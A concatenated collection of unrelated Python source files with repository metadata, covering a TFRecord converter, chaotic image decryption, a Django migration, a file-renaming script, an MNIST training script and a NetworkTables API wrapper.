import tensorflow as tf
import tqdm
import utils
# Command-line flags: input annotation file, image directory, output path
# prefix, and the number of output shards.
_GT_FILE = flags.DEFINE_string('gt_file', None, 'Path to the GT file')
_IMG_DIR = flags.DEFINE_string('img_dir', None, 'Path to the image folder.')
_OUT_FILE = flags.DEFINE_string('out_file', None, 'Path for the tfrecords.')
_NUM_SHARD = flags.DEFINE_integer(
    'num_shard', 100, 'The number of shards of tfrecords.')
def main(unused_argv) -> None:
  """Convert HierText annotations into sharded TFRecord files.

  Reads the GT JSON, shuffles the annotations, splits them into
  `--num_shard` shards, and writes one TFRecord file per shard.
  """
  # Use a context manager so the GT file handle is closed deterministically
  # (previously the handle returned by open() was leaked).
  with open(_GT_FILE.value) as gt_file:
    annotations = json.load(gt_file)['annotations']
  random.shuffle(annotations)
  n_sample = len(annotations)
  n_shards = _NUM_SHARD.value
  # Ceiling division so every annotation lands in exactly one shard.
  n_sample_per_shard = (n_sample - 1) // n_shards + 1
  for shard in tqdm.tqdm(range(n_shards)):
    output_path = f'{_OUT_FILE.value}-{shard:05}-{n_shards:05}.tfrecords'
    annotation_subset = annotations[
        shard * n_sample_per_shard : (shard + 1) * n_sample_per_shard]
    with tf.io.TFRecordWriter(output_path) as file_writer:
      for annotation in annotation_subset:
        img_file_path = os.path.join(_IMG_DIR.value,
                                     f"{annotation['image_id']}.jpg")
        tfexample = utils.convert_to_tfe(img_file_path, annotation)
        file_writer.write(tfexample)
if __name__ == '__main__':
  # All three path flags are mandatory; absl aborts with usage info otherwise.
  flags.mark_flags_as_required(['gt_file', 'img_dir', 'out_file'])
  app.run(main)
| 2 | 2 |
henon_arnold/decrypt.py | Xus72/Encriptacion-caotica | 0 | 12764959 | <reponame>Xus72/Encriptacion-caotica<filename>henon_arnold/decrypt.py
import os
import henon_arnold.diffusion as dif
from PIL import ImageTk, Image
import henon_arnold.confusion as con
import henon_arnold.reshape as res
import cv2
import henon_arnold.Image as i
import time
def decrypt(filepath, destination_path, key):
    """Decrypt an image encrypted with the Henon/Arnold scheme.

    Pipeline: undiffusion -> unconfusion (inverse Arnold map) -> border crop,
    then the decrypted image is written to *destination_path* as PNG.

    :param filepath: path of the encrypted image file
    :param destination_path: directory the decrypted image is written to
    :param key: decryption key shared with the encryption step
    """
    im_encrypted = i.Image(filepath, i.Type.ENCRYPTED, cv2.imread(filepath, cv2.IMREAD_UNCHANGED), key)
    print(im_encrypted.filename)
    path = os.path.join('.', 'images')
    #begin undiffusion
    # NOTE(review): intermediate paths use Windows "\\" separators
    # unconditionally; only relevant if the commented-out imwrite calls
    # below are re-enabled on POSIX — verify before uncommenting there.
    im_undiffused = i.Image(path+"\\undiffused\\"+im_encrypted.filename.split('.')[0]+".png", i.Type.UNDIFFUSED, dif.pixelManipulation(im_encrypted), key)
    #uncomment code below to save the output of undiffusion
    # cv2.imwrite(im_undiffused.filepath, im_undiffused.matrix)
    #begin unconfusion (timed)
    start_time = time.perf_counter()
    im_unconfused = i.Image(path+"\\unconfused\\"+im_encrypted.filename.split('.')[0]+".png", i.Type.UNCONFUSED, con.reconstructArnoldMap(im_undiffused), key)
    elapsed_time = time.perf_counter() - start_time
    print(f"Elapsed time: {elapsed_time:0.4f} seconds")
    #uncomment code below to save the output of unconfusion
    # cv2.imwrite(im_unconfused.filepath, im_unconfused.matrix)
    #reshape crop border (timed); output separator depends on the OS
    start_time = time.perf_counter()
    if os.name == "posix":
        im_decrypted = i.Image(destination_path+"/"+im_encrypted.filename.split('.')[0]+".png", i.Type.DECRYPTED, res.cropBorder(im_unconfused), key)
    else:
        im_decrypted = i.Image(destination_path+"\\"+im_encrypted.filename.split('.')[0]+".png", i.Type.DECRYPTED, res.cropBorder(im_unconfused), key)
    elapsed_time = time.perf_counter() - start_time
    print(f"Elapsed time: {elapsed_time:0.4f} seconds")
    cv2.imwrite(im_decrypted.filepath, im_decrypted.matrix)
| 2.828125 | 3 |
main/migrations/0018_dmis_reponse_tools.py | IFRCGo/ifrcgo_react | 0 | 12764960 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-11-28 18:45
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated Django migration: creates the Dmis_reponse_tools model
    (DMIS response tools per report). Do not edit by hand beyond comments."""
    dependencies = [
        ('main', '0017_auto_20161123_2339'),
    ]
    operations = [
        migrations.CreateModel(
            name='Dmis_reponse_tools',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('ReportID', models.IntegerField()),
                ('RIT', models.CharField(max_length=255)),
                ('RDRT', models.CharField(max_length=255)),
                ('FACT', models.CharField(max_length=255)),
                ('ERU', models.CharField(max_length=255)),
                ('RFL', models.CharField(max_length=255)),
            ],
        ),
    ]
| 1.632813 | 2 |
tests/test_plants_pineapple.py | nielse63/PiPlanter | 0 | 12764961 | import pyplanter.plants.pineapple
def test_plants_pineapple():
    # Import smoke test: passes as long as pyplanter.plants.pineapple
    # imports cleanly at module load; no behaviour is exercised yet.
    pass
| 0.984375 | 1 |
projectile_motion/__init__.py | trungleduc/projectile-motion | 0 | 12764962 | <filename>projectile_motion/__init__.py
"""CoSApp project Projectile Motion
Projectile Motion Simulation
"""
from ._version import __version__
def find_resources(filename: str = "") -> str:
    """Return the absolute path of *filename* inside the package resources folder.

    Parameters
    ----------
    filename: str, optional
        File or directory looked for; defaults to the resources folder itself.

    Returns
    -------
    str
        Full path to the requested resource.

    Raises
    ------
    FileNotFoundError
        If the resolved path does not exist on disk.
    """
    import os
    candidate = os.path.join(__path__[0], "resources", filename)
    resolved = os.path.realpath(candidate)
    if os.path.exists(resolved):
        return resolved
    raise FileNotFoundError(resolved)
def _cosapp_lab_load_module():
    """Entry point used by CoSApp Lab to open the demo dashboard.

    Builds the ProjectileMotion system, runs it once, and wraps it in a
    SysExplorer widget configured with the bundled ``ui.json`` template.
    """
    from projectile_motion.systems import ProjectileMotion
    from cosapp_lab.widgets import SysExplorer
    s = ProjectileMotion("s")
    s.run_once()
    a = SysExplorer(s, template = find_resources('ui.json'))
def _cosapp_lab_module_meta():
return {"title": "Projectile Motion Demo", "description": "Projectile motion modelling demo", "version": "0.1.0"}
__all__ = ["drivers", "ports", "systems", "tools"]
| 2.78125 | 3 |
change_name_recurse.py | imoyao/WIKI | 5 | 12764963 | <reponame>imoyao/WIKI
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Created by Administrator at 2020/12/12 20:48
"""
该脚本会递归替换执行目录下的文件名称
在要批处理的目录的上级运行该脚本
1. 如果没有给定ROOT_PATH,则直接以脚本所在目录为root
2. 否则,以用户给定为准
3. 我们可以给定rename的多个根目录,也可以直接以root为根目录,取决于你的“一级目录”是否很多
"""
import os
import pathlib
import re
current_path = os.path.dirname(os.path.abspath(__file__))
# 需要处理目录的绝对路径
ROOT_PATH = os.path.join(current_path, 'docs')
EXCLUDE_DIR = ['.vuepress', '@pages', '_posts', 'styles', 'images']
START_REMOVE_LISTS = ['.', '-', '_']
def get_exclude_children(exclude_dir):
    """Collect the excluded directories together with all their descendants.

    :param exclude_dir: list of directory names relative to ROOT_PATH
    :return: tuple of two sets: (directory names, file names) found under the
        excluded directories, including the originals themselves
    """
    all_dirs = list(exclude_dir)
    all_files = []
    for name in exclude_dir:
        walk_root = os.path.join(ROOT_PATH, name)
        for _, sub_dirs, sub_files in os.walk(walk_root):
            all_dirs.extend(sub_dirs)
            all_files.extend(sub_files)
    return set(all_dirs), set(all_files)
def reg_startswith(check_str, reg):
    """Match the expression *reg* against the beginning of *check_str*.

    Example: matching digits against '10.foo.md' yields a match object,
    while 'bar' yields None.

    :param check_str: string to be tested
    :param reg: regular expression fragment
    :return: re.Match object, or None when the string does not start with *reg*
    """
    anchored = fr'^{reg}'
    return re.match(anchored, check_str)
def is_md_file(file_path):
    """Return True when *file_path* has a (case-insensitive) ``.md`` extension.

    :param file_path: path-like or string to inspect
    :return: bool
    """
    extension = pathlib.PurePath(file_path).suffix
    return extension[1:].lower() == 'md'
def full_path(_root, file):
    """Join *file* onto *_root* and return the combined PurePath."""
    return pathlib.PurePath(_root) / file
def order_file_list_by_ctime(root, file_lists):
    """Sort *file_lists* (in place) by creation time and keep only markdown files.

    :param root: directory containing the entries
    :param file_lists: list of entry names inside *root*; mutated (sorted by ctime)
    :return: the names that are existing ``.md`` files, in ctime order
    """
    def _ctime(name):
        return pathlib.Path(full_path(root, name)).stat().st_ctime

    file_lists.sort(key=_ctime)
    markdown_names = []
    for name in file_lists:
        candidate = full_path(root, name)
        # Keep only regular files that are markdown documents.
        if pathlib.Path(candidate).is_file() and is_md_file(candidate):
            markdown_names.append(name)
    return markdown_names
def make_rename(sub_line):
    """Normalise a name fragment for renaming.

    Strips one leading '.', '-' or '_' and converts remaining dots to
    dashes so they are not mistaken for file extensions, e.g.
    '_xx.yyy' -> 'xx-yyy', 'xx-yyy' -> 'xx-yyy', unicode text is untouched.

    :param sub_line: name fragment to normalise
    :return: normalised fragment
    """
    # Drop a single leading separator character, if present.
    if sub_line and sub_line[0] in START_REMOVE_LISTS:
        trimmed = sub_line[1:]
    else:
        trimmed = sub_line
    # Replace inner dots so only the real suffix reads as an extension.
    if '.' in trimmed:
        return trimmed.replace('.', '-')
    return trimmed
def rename_path_without_exclude(root_path, exclude_seq):
    """
    Walk *root_path* bottom-up and rename every non-excluded directory and
    markdown file, giving each a zero-padded numeric prefix.
    :param root_path: str, directory tree to process
    :param exclude_seq: iterable, (excluded directory names, excluded file names)
    :return:
    """
    exclude_dirs, exclude_files = exclude_seq
    # def _not_in(all_seq, filter_seq):
    #     """
    #     Variant using `not in`
    #     :param all_seq:
    #     :param filter_seq:
    #     :return:
    #     """
    #     return [item for item in all_seq if item not in filter_seq]
    # def _filter_sth(seq, exclude):
    #     """
    #     Variant using filter()
    #     :param seq:
    #     :param exclude:
    #     :return:
    #     """
    #     return list(filter(lambda x: x not in exclude, seq))
    def _subtract_set(seq, exclude):
        """
        Set-difference approach (fastest of the three variants above).
        :param seq:
        :param exclude:
        :return:
        """
        return list(set(seq) - set(exclude))
    # topdown=False renames leaves first, so parent paths stay valid while
    # their children are processed.
    for root, dirs, files in os.walk(root_path, topdown=False):
        # [python - Excluding directories in os.walk - Stack Overflow]
        # (https://stackoverflow.com/questions/19859840/excluding-directories-in-os.walk)
        # In-place assignment is required so os.walk skips the pruned dirs.
        dirs[:] = _subtract_set(dirs, exclude_dirs)
        files[:] = _subtract_set(files, exclude_files)
        # Numeric prefixes already used inside this directory.
        count_set = set()
        count = 0
        def handler_action(_root, path_item, is_file=True):
            # Compute (old_path, new_path) for one entry; tracks prefix numbers
            # via the enclosing count/count_set.
            nonlocal count, count_set
            add_suffix = ''
            if is_file:
                add_suffix = '.md'
            reg_exp = r'\d+'
            reg_match_obj = reg_startswith(path_item, reg_exp)
            if reg_match_obj:
                # The entry already carries a numeric prefix: keep it.
                digital = reg_match_obj.group()
                count = int(digital)
                count_set.add(count)
                if is_file:
                    deal_line = pathlib.PurePath(path_item).stem
                else:
                    deal_line = pathlib.PurePath(path_item).parts[-1]
                sub_line = re.sub(reg_exp, "", deal_line)
                if sub_line.startswith('.'):
                    sub_line = sub_line[1:]
                sub_name = make_rename(sub_line)
                new_name_with_suffix = f'{digital}.{sub_name}{add_suffix}'
            else:
                if is_file:
                    path_str = pathlib.PurePath(path_item).stem
                else:
                    path_str = pathlib.PurePath(path_item).parts[-1]
                new_name = make_rename(path_str)
                # Find the largest used prefix, then +1 becomes the new number.
                if count_set:
                    count = max(count_set)
                count += 1
                count_set.add(count)
                new_name_with_suffix = f'{count:02}.{new_name}{add_suffix}'
            old = os.path.join(_root, path_item)
            new = os.path.join(_root, new_name_with_suffix)
            return old, new
        for dir_item in dirs:
            old_dir_with_full_path, new_dir_with_full_path = handler_action(root, dir_item, is_file=False)
            rename_path(old_dir_with_full_path, new_dir_with_full_path)
            print(f'Direc Convert: {old_dir_with_full_path} ***to*** {new_dir_with_full_path}')
        # Files are numbered in creation-time order.
        order_files = order_file_list_by_ctime(root, files)
        for file_item in order_files:
            old_name_with_full_path, new_name_with_full_path = handler_action(root, file_item)
            rename_path(old_name_with_full_path, new_name_with_full_path)
            print(f'File Convert: {old_name_with_full_path} ===to==== {new_name_with_full_path}')
def rename_path(old, new):
    """Rename *old* to *new* via pathlib; returns 0 for historical reasons."""
    source = pathlib.Path(fr'{old}')
    destination = pathlib.Path(fr'{new}')
    source.rename(destination)
    return 0
def main():
    """
    Collect the excluded sub-directories and files,
    then run the rename operation on each selected top-level directory.
    :return:
    """
    exclude_children = get_exclude_children(EXCLUDE_DIR)
    # Rename only the listed sub-directories directly, rather than all of docs.
    for path in ['💡科普', '🛠软件工具', '💻工作', '📌TODO', '💰投资理财']:
        # for path in [r'Python\16.设计模式']:
        root = full_path(ROOT_PATH, path)
        print(root)
        rename_path_without_exclude(root, exclude_children)
if __name__ == '__main__':
    main()
| 2.4375 | 2 |
mtinkerer/utils.py | Legutier/mtinkerer | 0 | 12764964 | <filename>mtinkerer/utils.py<gh_stars>0
import sys
def dir_slash():
    """Return the path separator character for the current platform.

    Uses ``sys.platform.startswith('win')`` rather than a substring test:
    ``'win' in sys.platform`` also matches macOS, whose platform string is
    ``'darwin'``, and would wrongly return a backslash there.
    """
    slash = '/'
    if sys.platform.startswith('win'):
        slash = '\\'
    return slash
| 2.078125 | 2 |
hackerrank/Algorithms/Sherlock and The Beast/test.py | ATrain951/01.python-com_Qproject | 4 | 12764965 | <gh_stars>1-10
import io
import unittest
from contextlib import redirect_stdout
import solution
class TestQ(unittest.TestCase):
    """Checks solution.decentNumber's printed output for sample inputs."""

    def _capture(self, values):
        # Run decentNumber for each length and return everything it printed.
        buffer = io.StringIO()
        with redirect_stdout(buffer):
            for value in values:
                solution.decentNumber(value)
        return buffer.getvalue()

    def test_case_0(self):
        printed = self._capture([1, 3, 5, 11])
        self.assertEqual(printed, '-1\n555\n33333\n55555533333\n')

    def test_case_1(self):
        printed = self._capture([15, 13])
        self.assertEqual(printed, '555555555555555\n5553333333333\n')


if __name__ == '__main__':
    unittest.main()
| 2.828125 | 3 |
find_center.py | ryanbanderson/volume_measure | 0 | 12764966 | import matplotlib.pyplot as plot
import numpy as np
#Function to get x and y coordinates from the first 10 clicks, then close the image.
def onclick(event):
x.append(event.xdata)
y.append(event.ydata)
print(len(x))
xval = int(event.xdata)
yval = int(event.ydata)
print(str([xval,yval]))
if len(x) == 10:
event.canvas.mpl_disconnect(cid)
print('DISCONNECT')
plot.close()
'''
This script takes a DEM image as input, and allows the user to click 10 points along the rim. A circle is fit to the
points and the center coordinates are returned
'''
def circlefit(dem):
    """Display *dem*, collect 10 rim clicks, and least-squares fit a circle.

    Returns (xc, yc): the fitted centre coordinates. NOTE(review): each is a
    length-1 numpy array (a row of the lstsq solution), not a scalar —
    confirm callers expect that.
    """
    #define x and y as global list variables (filled by the onclick handler)
    global x,y
    x = []
    y = []
    #show the DEM
    plot.imshow(dem)
    ax = plot.gca()
    fig = plot.gcf()
    fig.suptitle('Click 10 points on the crater rim to fit with a circle:')
    #Set up to run the function onclick every time the user clicks the image
    global cid
    cid = fig.canvas.mpl_connect('button_press_event',onclick)
    # Blocks until onclick closes the figure after 10 clicks.
    plot.show()
    # define coordinates as arrays
    x = np.array(x)
    y = np.array(y)
    # create arrays used in circle calculation:
    # circle x^2 + y^2 + A*x + B*y + C = 0 rearranged to the linear system
    # A*x + B*y + C = -(x^2 + y^2), so centre = (-A/2, -B/2).
    a1 = np.array([x, y, np.ones(np.shape(x))])
    a2 = np.array([-(x ** 2 + y ** 2)])
    # solve the least squares fit to get the center point
    a = np.linalg.lstsq(a1.T, a2.T, rcond=None)[0]
    xc = -0.5 * a[0]
    yc = -0.5 * a[1]
    return xc, yc
utils.py | bmwant/wcbot | 0 | 12764967 | import logging
import coloredlogs
# Shared log line layout and the formatter instance applied to every handler.
FORMAT = '[%(name)s] %(levelname)s:%(message)s'
FORMATTER = logging.Formatter(fmt=FORMAT)


def get_logger(name='default', level=logging.DEBUG, colored=False):
    """Return a configured, non-propagating logger with one stream handler.

    :param name: logger name (loggers are cached by name by the logging module)
    :param level: minimum level to emit
    :param colored: when True, install coloredlogs on top of the logger
    """
    log = logging.getLogger(name)
    log.propagate = False
    log.setLevel(level)
    # Attach a handler only once, even when the same name is requested again.
    if not log.handlers:
        stream_handler = logging.StreamHandler()
        stream_handler.setFormatter(fmt=FORMATTER)
        log.addHandler(stream_handler)
    if colored:
        coloredlogs.install(level=level, logger=log)
    return log
| 2.59375 | 3 |
09_checkpoints.py | psteinb/20220308-dlr-pytorchintro | 1 | 12764968 | ## https://notes.desy.de/s/ljPrespZd#Infrastructure--Cluster-login
import torch
## for the code to work, install torchvision
## $ python -m pip install --user -I --no-deps torchvision
import torchvision
from torchvision import datasets, transforms
## NB: in case torchvision cannot be found inside a jupyter notebook, fix the PYTHONPATH through
## import sys
## sys.path.append("/home/haicore-project-ws-hip-2021/mk7540/.local/lib/python3.8/site-packages/")
def load_data(
    somepath,
    norm_loc=(0.1307,),  ## mu of normal dist to normalize by
    norm_scale=(0.3081,),  ## sigma of normal dist to normalize by
    train_kwargs=None,
    test_kwargs=None,
    use_cuda=torch.cuda.device_count() > 0,
):
    """load MNIST data and return train/test loader object

    ``train_kwargs`` / ``test_kwargs`` default to
    ``{"batch_size": 64, "shuffle": True}`` and ``{"batch_size": 1000}``.
    They were previously mutable default arguments that the function mutated
    in place via ``dict.update``, so the CUDA-specific entries leaked into
    every subsequent call; ``None`` sentinels avoid that classic pitfall.

    NOTE(review): the ``use_cuda`` default is evaluated once at import time,
    not per call — confirm that is intended.
    """
    if train_kwargs is None:
        train_kwargs = {"batch_size": 64, "shuffle": True}
    if test_kwargs is None:
        test_kwargs = {"batch_size": 1_000}

    transform_ = transforms.Compose(
        # TODO where do the magic numbers come from?
        [transforms.ToTensor(), transforms.Normalize(norm_loc, norm_scale)]
    )

    train_dataset = datasets.MNIST(
        somepath, download=True, transform=transform_, train=True
    )
    test_dataset = datasets.MNIST(
        somepath, download=True, transform=transform_, train=False
    )

    if use_cuda:
        # Pinned memory + worker processes speed up host-to-device transfers.
        train_kwargs.update({"num_workers": 1, "pin_memory": True, "shuffle": True})
        test_kwargs.update({"num_workers": 1, "pin_memory": True, "shuffle": True})

    train_loader = torch.utils.data.DataLoader(train_dataset, **train_kwargs)
    test_loader = torch.utils.data.DataLoader(test_dataset, **test_kwargs)

    return train_loader, test_loader
import torch.nn as nn
import torch.nn.functional as F
class MyNetwork(nn.Module):
    """a very basic relu neural network involving conv, dense, max_pool and dropout layers"""

    def __init__(self):
        super(MyNetwork, self).__init__()
        # Two 3x3 convolutions: 1 -> 32 -> 64 channels.
        self.conv1 = nn.Conv2d(1, 32, 3, 1)
        self.conv2 = nn.Conv2d(32, 64, 3)
        self.dropout1 = nn.Dropout(0.25)
        self.dropout2 = nn.Dropout(0.5)
        # 64 channels * 12 * 12 spatial positions after pooling = 9216 inputs.
        self.fc1 = nn.Linear(9216, 128)
        self.fc2 = nn.Linear(128, 10)

    def forward(self, x):
        """Return per-class log-probabilities of shape (batch, 10)."""
        features = F.relu(self.conv1(x))
        features = F.relu(self.conv2(features))
        features = self.dropout1(F.max_pool2d(features, 2))
        flat = torch.flatten(features, 1)
        hidden = self.dropout2(F.relu(self.fc1(flat)))
        logits = self.fc2(hidden)
        return F.log_softmax(logits, dim=1)
from pathlib import Path
import torch.optim as optim
# from torch.utils.tensorboard import SummaryWriter
from tensorboardX import SummaryWriter
def main(somepath="./pytorch-data"):
    """load the data set and run a random init CNN on it"""
    # is a GPU available?
    cuda_present = torch.cuda.is_available()
    ndevices = torch.cuda.device_count()
    use_cuda = cuda_present and ndevices > 0
    device = torch.device("cuda" if use_cuda else "cpu")  # "cuda:0" ... default device
    # "cuda:1" would be GPU index 1, "cuda:2" etc

    train_loader, test_loader = load_data(somepath, use_cuda=use_cuda)

    model = MyNetwork().to(device)
    optimizer = optim.Adadelta(model.parameters(), lr=1.0)
    max_nepochs = 1
    log_interval = 5
    # Snapshot of the first parameter tensor, used below to verify training
    # actually changed the weights.
    init_params = list(model.parameters())[0].clone().detach()
    writer = SummaryWriter(log_dir="logs", comment="this is the test of SummaryWriter")

    model.train(True)
    # Checkpoints are written once per epoch into this folder.
    chpfolder = Path("chkpts")
    if not chpfolder.is_dir():
        chpfolder.mkdir()

    for epoch in range(1, max_nepochs + 1):
        for batch_idx, (X, y) in enumerate(train_loader):
            # print("train", batch_idx, X.shape, y.shape)
            X, y = X.to(device), y.to(device)
            # download from GPU to CPU: X_cpu = X.cpu()
            # download from GPU to CPU: X_cpu = X.to(torch.device("cpu"))
            # download from GPU to CPU: X_cpu = X.detach().numpy()
            optimizer.zero_grad()
            prediction = model(X)
            loss = F.nll_loss(prediction, y)
            loss.backward()
            optimizer.step()
            if batch_idx % log_interval == 0:
                print(
                    "Train Epoch:",
                    epoch,
                    batch_idx * len(X),
                    len(train_loader.dataset),
                    loss.item(),
                )
            if batch_idx % 10 == 0:
                writer.add_scalar("Loss/train/batch10", loss.item(), batch_idx)
        # epoch finished: persist model + optimizer state for later resumption.
        cpath = chpfolder / f"epoch-{epoch:03.0f}.pth"
        torch.save(
            {
                "final_epoch": epoch,
                "model_state_dict": model.state_dict(),
                "optimizer_state_dict": optimizer.state_dict(),
            },
            cpath,
        )
        assert cpath.is_file() and cpath.stat().st_size > 0

    # Training must have moved the weights away from their initial values.
    final_params = list(model.parameters())[0].clone().detach()
    assert not torch.allclose(init_params, final_params)

    # when to reload chkp
    # payload = torch.load(cpath)
    # model = MyNetwork()
    # model.load_state_dict(payload['model_state_dict'])
    # continue learning/training after this


if __name__ == "__main__":
    main()
    print("Ok. Checkpoint on loading data reached.")
| 2.46875 | 2 |
ntcore/api.py | amorygalili/pynetworktables | 0 | 12764969 | <reponame>amorygalili/pynetworktables
# validated: 2018-11-27 DS 8eafe7f32561 cpp/ntcore_cpp.cpp
from .connection_notifier import ConnectionNotifier
from .dispatcher import Dispatcher
from .ds_client import DsClient
from .entry_notifier import EntryNotifier
from .rpc_server import RpcServer
from .storage import Storage
from ntcore.constants import NT_NOTIFY_IMMEDIATE, NT_NOTIFY_NEW
# Bitmask for notifications that represent a newly-seen value.
_is_new = NT_NOTIFY_IMMEDIATE | NT_NOTIFY_NEW


class NtCoreApi(object):
    """
    Internal NetworkTables API wrapper

    In theory you could create multiple instances of this
    and talk to multiple NT servers or create multiple
    NT servers... though, I don't really know why one
    would want to do this.

    Most methods are thin delegations to the underlying Storage /
    Dispatcher / notifier components.
    """

    def __init__(self, entry_creator, verbose=False):
        self.conn_notifier = ConnectionNotifier(verbose=verbose)
        self.entry_notifier = EntryNotifier(verbose=verbose)
        self.rpc_server = RpcServer(verbose=verbose)
        self.storage = Storage(self.entry_notifier, self.rpc_server, entry_creator)
        self.dispatcher = Dispatcher(self.storage, self.conn_notifier, verbose=verbose)
        self.ds_client = DsClient(self.dispatcher, verbose=verbose)

    def stop(self):
        # Shut components down in dependency order (clients first).
        self.ds_client.stop()
        self.dispatcher.stop()
        self.rpc_server.stop()
        self.entry_notifier.stop()
        self.conn_notifier.stop()
        self.storage.stop()

    def destroy(self):
        # Drop all component references so they can be garbage collected.
        # (The original code assigned entry_notifier = None twice; the
        # duplicate assignment has been removed.)
        self.ds_client = None
        self.dispatcher = None
        self.rpc_server = None
        self.entry_notifier = None
        self.conn_notifier = None
        self.storage = None

    #
    # Table functions
    #

    def getEntry(self, name):
        return self.storage.getEntry(name)

    def getEntryId(self, name):
        return self.storage.getEntryId(name)

    def getEntries(self, prefix, types):
        return self.storage.getEntries(prefix, types)

    def getEntryNameById(self, local_id):
        return self.storage.getEntryNameById(local_id)

    def getEntryTypeById(self, local_id):
        return self.storage.getEntryTypeById(local_id)

    def getEntryValue(self, name):
        return self.storage.getEntryValue(name)

    def getEntryValueById(self, local_id):
        return self.storage.getEntryValueById(local_id)

    def setDefaultEntryValue(self, name, value):
        return self.storage.setDefaultEntryValue(name, value)

    def setDefaultEntryValueById(self, local_id, value):
        return self.storage.setDefaultEntryValueById(local_id, value)

    def setEntryValue(self, name, value):
        return self.storage.setEntryValue(name, value)

    def setEntryValueById(self, local_id, value):
        return self.storage.setEntryValueById(local_id, value)

    def setEntryTypeValue(self, name, value):
        self.storage.setEntryTypeValue(name, value)

    def setEntryTypeValueById(self, local_id, value):
        self.storage.setEntryTypeValueById(local_id, value)

    def setEntryFlags(self, name, flags):
        self.storage.setEntryFlags(name, flags)

    def setEntryFlagsById(self, local_id, flags):
        self.storage.setEntryFlagsById(local_id, flags)

    def getEntryFlags(self, name):
        return self.storage.getEntryFlags(name)

    def getEntryFlagsById(self, local_id):
        # NOTE(review): unlike its *ById siblings this delegates to the
        # name-based getEntryFlags — confirm Storage accepts a local id here.
        return self.storage.getEntryFlags(local_id)

    def deleteEntry(self, name):
        self.storage.deleteEntry(name)

    def deleteEntryById(self, local_id):
        # NOTE(review): delegates to the name-based deleteEntry — confirm
        # Storage accepts a local id here.
        self.storage.deleteEntry(local_id)

    def deleteAllEntries(self):
        self.storage.deleteAllEntries()

    def getEntryInfo(self, prefix, types):
        return self.storage.getEntryInfo(prefix, types)

    def getEntryInfoById(self, local_id):
        return self.storage.getEntryInfoById(local_id)

    #
    # Entry notification
    #

    def addEntryListener(self, prefix, callback, flags):
        return self.storage.addListener(prefix, callback, flags)

    def addEntryListenerById(self, local_id, callback, flags):
        return self.storage.addListenerById(local_id, callback, flags)

    def addEntryListenerByIdEx(
        self, fromobj, key, local_id, callback, flags, paramIsNew
    ):
        # Adapts the (key, value, flags, ...) notification tuple to the
        # callback signature the caller asked for: either a boolean "is new"
        # flag or the raw notification flags.
        if paramIsNew:

            def listener(item):
                key_, value_, flags_, _ = item
                callback(fromobj, key, value_.value, (flags_ & _is_new) != 0)

        else:

            def listener(item):
                key_, value_, flags_, _ = item
                callback(fromobj, key, value_.value, flags_)

        return self.storage.addListenerById(local_id, listener, flags)

    def createEntryListenerPoller(self):
        return self.entry_notifier.createPoller()

    def destroyEntryListenerPoller(self, poller_uid):
        self.entry_notifier.removePoller(poller_uid)

    def addPolledEntryListener(self, poller_uid, prefix, flags):
        return self.storage.addPolledListener(poller_uid, prefix, flags)

    def addPolledEntryListenerById(self, poller_uid, local_id, flags):
        return self.storage.addPolledListenerById(poller_uid, local_id, flags)

    def pollEntryListener(self, poller_uid, timeout=None):
        return self.entry_notifier.poll(poller_uid, timeout=timeout)

    def cancelPollEntryListener(self, poller_uid):
        self.entry_notifier.cancelPoll(poller_uid)

    def removeEntryListener(self, listener_uid):
        self.entry_notifier.remove(listener_uid)

    def waitForEntryListenerQueue(self, timeout):
        return self.entry_notifier.waitForQueue(timeout)

    #
    # Connection notifications
    #

    def addConnectionListener(self, callback, immediate_notify):
        return self.dispatcher.addListener(callback, immediate_notify)

    def createConnectionListenerPoller(self):
        return self.conn_notifier.createPoller()

    def destroyConnectionListenerPoller(self, poller_uid):
        self.conn_notifier.removePoller(poller_uid)

    def addPolledConnectionListener(self, poller_uid, immediate_notify):
        return self.dispatcher.addPolledListener(poller_uid, immediate_notify)

    def pollConnectionListener(self, poller_uid, timeout=None):
        return self.conn_notifier.poll(poller_uid, timeout=timeout)

    def cancelPollConnectionListener(self, poller_uid):
        self.conn_notifier.cancelPoll()

    def removeConnectionListener(self, listener_uid):
        self.conn_notifier.remove(listener_uid)

    def waitForConnectionListenerQueue(self, timeout):
        return self.conn_notifier.waitForQueue(timeout)

    #
    # TODO: RPC stuff not currently implemented
    #       .. there's probably a good pythonic way to implement
    #          it, but I don't really want to deal with it now.
    #          If you care, submit a PR.
    #
    #          I would have the caller register the server function
    #          via a docstring.
    #

    #
    # Client/Server Functions
    #

    def setNetworkIdentity(self, name):
        self.dispatcher.setIdentity(name)

    def getNetworkMode(self):
        return self.dispatcher.getNetworkMode()

    # python-specific
    def startTestMode(self, is_server):
        if self.dispatcher.startTestMode(is_server):
            self.storage.m_server = is_server
            return True
        else:
            return False

    def startServer(self, persist_filename, listen_address, port):
        return self.dispatcher.startServer(persist_filename, listen_address, port)

    def stopServer(self):
        self.dispatcher.stop()

    def startClient(self):
        return self.dispatcher.startClient()

    def stopClient(self):
        self.dispatcher.stop()

    def setServer(self, server_or_servers):
        self.dispatcher.setServer(server_or_servers)

    def setServerTeam(self, teamNumber, port):
        self.dispatcher.setServerTeam(teamNumber, port)

    def startDSClient(self, port):
        self.ds_client.start(port)

    def stopDSClient(self):
        self.ds_client.stop()

    def setUpdateRate(self, interval):
        self.dispatcher.setUpdateRate(interval)

    def flush(self):
        self.dispatcher.flush()

    def getRemoteAddress(self):
        # Returns the remote IP of the first connection (clients only),
        # or None when acting as a server or not connected.
        if not self.dispatcher.isServer():
            for conn in self.dispatcher.getConnections():
                return conn.remote_ip

    def getIsConnected(self):
        return self.dispatcher.isConnected()

    def setVerboseLogging(self, verbose):
        self.conn_notifier.setVerboseLogging(verbose)
        self.dispatcher.setVerboseLogging(verbose)
        self.entry_notifier.setVerboseLogging(verbose)
        self.rpc_server.setVerboseLogging(verbose)

    #
    # Persistence
    #

    def savePersistent(self, filename):
        return self.storage.savePersistent(filename, periodic=False)

    def loadPersistent(self, filename):
        return self.storage.loadPersistent(filename)

    def saveEntries(self, filename, prefix):
        return self.storage.saveEntries(prefix, filename=filename)

    def loadEntries(self, filename, prefix):
        return self.storage.loadEntries(filename=filename, prefix=prefix)
| 2.234375 | 2 |
src/toncli/modules/utils/func/commands.py | disintar/toncli | 25 | 12764970 | <gh_stars>10-100
import os
import subprocess
import sys
from typing import Optional, List
import yaml
from colorama import Fore, Style
